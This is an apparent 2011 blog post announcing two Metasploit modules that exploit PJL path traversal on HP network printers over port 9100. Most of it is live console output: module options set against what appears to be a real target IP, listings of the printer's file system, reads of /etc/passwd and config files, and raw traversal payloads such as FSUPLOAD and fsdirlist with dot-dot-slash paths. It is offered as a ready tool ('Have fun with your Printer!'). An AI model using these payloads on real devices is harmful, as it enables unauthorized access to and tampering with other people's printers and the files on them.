Sunday, August 7, 2011

[Metasploit] New Modules: hp_printer_pjl_traversal & hp_printer_pjl_cmd

http://www.exploit-db.com/exploits/17635/
http://www.exploit-db.com/exploits/17636/
_____________________________________________________

hp_printer_pjl_traversal:

This module exploits path traveresal issue in possibly all HP network-enabled printer series, especially those which enable Printer Job Language (aka PJL) command interface through the default JetDirect port 9100.
With the decade-old dot-dot-slash payloads, the entire printer file system can be accessed or modified.

msf auxiliary(hp_printer_pjl_traversal) > show options

Module options (auxiliary/admin/hp_printer_pjl_traversal):

Name         Current Setting  Required  Description
----         ---------------  --------  -----------
INTERACTIVE  true             no        Enter interactive mode [msfconsole Only]
RHOST        202.138.16.21    yes       The target address
RPATH        /hp              yes       The remote filesystem path to browse or read
RPORT        9100             yes       The target port

msf auxiliary(hp_printer_pjl_traversal) > set RPATH /
RPATH => /
msf auxiliary(hp_printer_pjl_traversal) > run

[*] Entering interactive mode
[*] cd / ...
[+] Server returned the following response:

. TYPE=DIR
.. TYPE=DIR
bin TYPE=DIR
usr TYPE=DIR
etc TYPE=DIR
hpmnt TYPE=DIR
hp TYPE=DIR
lib TYPE=DIR
dev TYPE=DIR
init TYPE=FILE SIZE=9016
.profile TYPE=FILE SIZE=834
tmp TYPE=DIR

[*] Current RPATH: /
[*] -> 'quit' to exit
[*] ->'/' to return to file system root
[*] ->'..' to move up to one directory
[*] ->'!r FILE' to read FILE on current directory

[*] Enter RPATH:
$ > hp
[*] cd /hp ...
[+] Server returned the following response:

. TYPE=DIR
.. TYPE=DIR
app TYPE=DIR
lib TYPE=DIR
bin TYPE=DIR
webServer TYPE=DIR
images TYPE=DIR
DemoPage TYPE=DIR
loc TYPE=DIR
AsianFonts TYPE=DIR
data TYPE=DIR
etc TYPE=DIR
lrt TYPE=DIR

[*] Current RPATH: /hp
[*] -> 'quit' to exit
[*] ->'/' to return to file system root
[*] ->'..' to move up to one directory
[*] ->'!r FILE' to read FILE on current directory

[*] Enter RPATH:
$ > webServer/config
[*] cd /hp/webServer/config ...
[+] Server returned the following response:

. TYPE=DIR
.. TYPE=DIR
soe.xml TYPE=FILE SIZE=23615
version.6 TYPE=FILE SIZE=45

[*] Current RPATH: /hp/webServer/config
[*] -> 'quit' to exit
[*] ->'/' to return to file system root
[*] ->'..' to move up to one directory
[*] ->'!r FILE' to read FILE on current directory

[*] Enter RPATH:
$ > !r version.6
[*] cat /hp/webServer/config/version.6 ...
[+] Server returned the following response:

WebServer directory version.  Do not delete!

[*] Current RPATH: /hp/webServer/config
[*] -> 'quit' to exit
[*] ->'/' to return to file system root
[*] ->'..' to move up to one directory
[*] ->'!r FILE' to read FILE on current directory

[*] Enter RPATH:
$ > /
[*] cd / ...
[+] Server returned the following response:

. TYPE=DIR
.. TYPE=DIR
bin TYPE=DIR
usr TYPE=DIR
etc TYPE=DIR
hpmnt TYPE=DIR
hp TYPE=DIR
lib TYPE=DIR
dev TYPE=DIR
init TYPE=FILE SIZE=9016
.profile TYPE=FILE SIZE=834
tmp TYPE=DIR

[*] Current RPATH: /
[*] -> 'quit' to exit
[*] ->'/' to return to file system root
[*] ->'..' to move up to one directory
[*] ->'!r FILE' to read FILE on current directory

[*] Enter RPATH:
$ > !r etc/passwd
[*] cat /etc/passwd ...
[+] Server returned the following response:

root::0:0::/:/bin/dlsh

[*] Current RPATH: /
[*] -> 'quit' to exit
[*] ->'/' to return to file system root
[*] ->'..' to move up to one directory
[*] ->'!r FILE' to read FILE on current directory

[*] Enter RPATH:
$ > quit
[*] Exited ... Have fun with your Printer!
[*] Auxiliary module execution completed


hp_printer_pjl_cmd:

This module acts as a HP printer PJL (Printer Job Language) query tool that allows you to submit your own PJL commands. Valid PJL commands are required to get successful response. See the reference section for PJL reference guides from HP.

msf auxiliary(hp_printer_pjl_cmd) > run

[*] Entering interactive mode ...
[*] Please wait while executing -
[*] FSUPLOAD NAME="0:/../../../etc/passwd" OFFSET=0 SIZE=999
[+] Server returned the following response:

root::0:0::/:/bin/dlsh

[*] Enter PJL Command:
[*] -> 'quit' to exit
$ > fsdirlist name="0:/../../../" entry=1 count=99999999
[*] Please wait while executing -
[*] fsdirlist name="0:/../../../" entry=1 count=99999999
[+] Server returned the following response:

. TYPE=DIR
.. TYPE=DIR
bin TYPE=DIR
usr TYPE=DIR
etc TYPE=DIR
hpmnt TYPE=DIR
hp TYPE=DIR
lib TYPE=DIR
dev TYPE=DIR
init TYPE=FILE SIZE=9016
.profile TYPE=FILE SIZE=834
tmp TYPE=DIR

[*] Enter PJL Command:
[*] -> 'quit' to exit
$ > quit
[*] Exited ... Have fun with your Printer!
[*] Auxiliary module execution completed
msf auxiliary(hp_printer_pjl_cmd) >